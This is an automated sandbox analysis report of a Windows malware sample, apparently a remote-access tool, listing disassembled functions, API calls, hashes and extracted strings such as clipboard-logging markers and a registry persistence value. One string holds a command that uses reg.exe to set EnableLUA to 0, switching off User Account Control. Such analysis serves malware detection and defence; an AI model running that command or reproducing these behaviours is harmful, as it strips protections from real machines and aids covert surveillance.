                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$FileModuleName
                                                  • String ID: C:\Users\user\Desktop\NssBkEQKsI.exe$H%Y
                                                  • API String ID: 2506810119-295099252
                                                  • Opcode ID: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
                                                  • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                                                  • Opcode Fuzzy Hash: 517ef8501d39ed80bd5d3989cd54e6cd38b7eb486680de81052e85c6479d25b4
                                                  • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                                                  APIs
                                                    • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                    • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                    • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                  • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                    • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                    • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                  • String ID: [End of clipboard]$[Text copied to clipboard]$,]G$0]G
                                                  • API String ID: 2974294136-753205382
                                                  • Opcode ID: 84d5120d1790242da64ed9a6eb1f5c34e2201cb21d83ae33a80d74a94cbf0ed8
                                                  • Instruction ID: 172b4b58ae75f988d3b3a293bba3f35c56e57800f0e036023c2a0486d145437f
                                                  • Opcode Fuzzy Hash: 84d5120d1790242da64ed9a6eb1f5c34e2201cb21d83ae33a80d74a94cbf0ed8
                                                  • Instruction Fuzzy Hash: 44219F31A002099ACB14FB75D8929EE7774AF54318F50403FF406771E2EF386E4A8A8D
                                                  APIs
                                                  • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
                                                  • GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
                                                  • __dosmaperr.LIBCMT ref: 0044AAFE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseErrorHandleLast__dosmaperr
                                                  • String ID: 8e[$`@
                                                  • API String ID: 2583163307-2829003965
                                                  • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                  • Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
                                                  • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                  • Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
                                                  APIs
                                                  • RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                  • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                  • GetLastError.KERNEL32 ref: 0041CA91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ClassCreateErrorLastRegisterWindow
                                                  • String ID: 0$MsgWindowClass
                                                  • API String ID: 2877667751-2410386613
                                                  • Opcode ID: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                  • Instruction ID: bff961279ea7560c1ff94ea7b7e8445e3758215821d07408c43b005d8adda241
                                                  • Opcode Fuzzy Hash: 8e3fabf9294f4d788ff0190a2140b1e52dfb9086da58b750c2f99102573e0e65
                                                  • Instruction Fuzzy Hash: 2D01E9B1D1431EAB8B01DFE9DCC4AEFBBBDBE49255B50452AE410B2200E7704A448BA5
                                                  APIs
                                                  • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                  • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                  • CloseHandle.KERNEL32(?), ref: 00406A14
                                                  Strings
                                                  • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                  • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandle$CreateProcess
                                                  • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                  • API String ID: 2922976086-4183131282
                                                  • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                  • Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
                                                  • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                  • Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002), ref: 004425F9
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 0044262F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                  • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                                                  • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                  • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                                                  APIs
                                                  • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
                                                  • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
                                                  • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID: pth_unenc$BG
                                                  • API String ID: 1818849710-2233081382
                                                  • Opcode ID: 2b0b83c385fe9b11323970af50dff3bb0d924dce91bf1d9d78cbef32cf6cf5ea
                                                  • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                  • Opcode Fuzzy Hash: 2b0b83c385fe9b11323970af50dff3bb0d924dce91bf1d9d78cbef32cf6cf5ea
                                                  • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AED
                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404AF9
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B04
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B0D
                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                  • String ID: KeepAlive | Disabled
                                                  • API String ID: 2993684571-305739064
                                                  • Opcode ID: 1c0c748ad9fecb0dd528124c77293d7db353f6adbd4e84571b4901e68838a0a9
                                                  • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                                                  • Opcode Fuzzy Hash: 1c0c748ad9fecb0dd528124c77293d7db353f6adbd4e84571b4901e68838a0a9
                                                  • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
                                                  • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
                                                  • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
                                                  • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
                                                  Strings
                                                  • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                  • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                  • API String ID: 3024135584-2418719853
                                                  • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                  • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                  • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                  • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
                                                  • Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
                                                  • Opcode Fuzzy Hash: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
                                                  • Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9
                                                  APIs
                                                    • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                  • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                  • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                  • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                  • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                  • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                  • String ID:
                                                  • API String ID: 3525466593-0
                                                  • Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                  • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                                                  • Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                  • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                  • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
                                                  • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                  • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3ED,?,00000000,?,00000001,?,?,00000001,0043E3ED,?), ref: 0044FF20
                                                  • __alloca_probe_16.LIBCMT ref: 0044FF58
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFA9
                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399BF,?), ref: 0044FFBB
                                                  • __freea.LIBCMT ref: 0044FFC4
                                                    • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                  • String ID:
                                                  • API String ID: 313313983-0
                                                  • Opcode ID: e5c5c8948a56a23b630a502c5eb8adb4e32c2096ed66fc33659528e3aa194df3
                                                  • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                                                  • Opcode Fuzzy Hash: e5c5c8948a56a23b630a502c5eb8adb4e32c2096ed66fc33659528e3aa194df3
                                                  • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                                                  APIs
                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                                    • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                                                  • _free.LIBCMT ref: 0044E1A0
                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                  • String ID:
                                                  • API String ID: 336800556-0
                                                  • Opcode ID: cbfa98b2cae8c11c90072c2e77890abdc970385a4e1e7188d4ee333dffee03c0
                                                  • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                                                  • Opcode Fuzzy Hash: cbfa98b2cae8c11c90072c2e77890abdc970385a4e1e7188d4ee333dffee03c0
                                                  • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                                                  APIs
                                                  • GetLastError.KERNEL32(0000000A,0000000B,0000000A,00445359,00440A9B,00000000,?,?,?,?,00440C7E,00000000,0000000A,000000FF,0000000A,00000000), ref: 00446F48
                                                  • _free.LIBCMT ref: 00446F7D
                                                  • _free.LIBCMT ref: 00446FA4
                                                  • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FB1
                                                  • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FBA
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.3720899402.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.3720860980.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721052821.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.3721138986.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_NssBkEQKsI.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free
                                                  • String ID:
                                                  • API String ID: 3170660625-0
                                                  • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                  • Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
                                                  • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                  • Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
                                                  APIs
                                                  • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                  • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041B3C8
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
                                                  Memory Dump Source
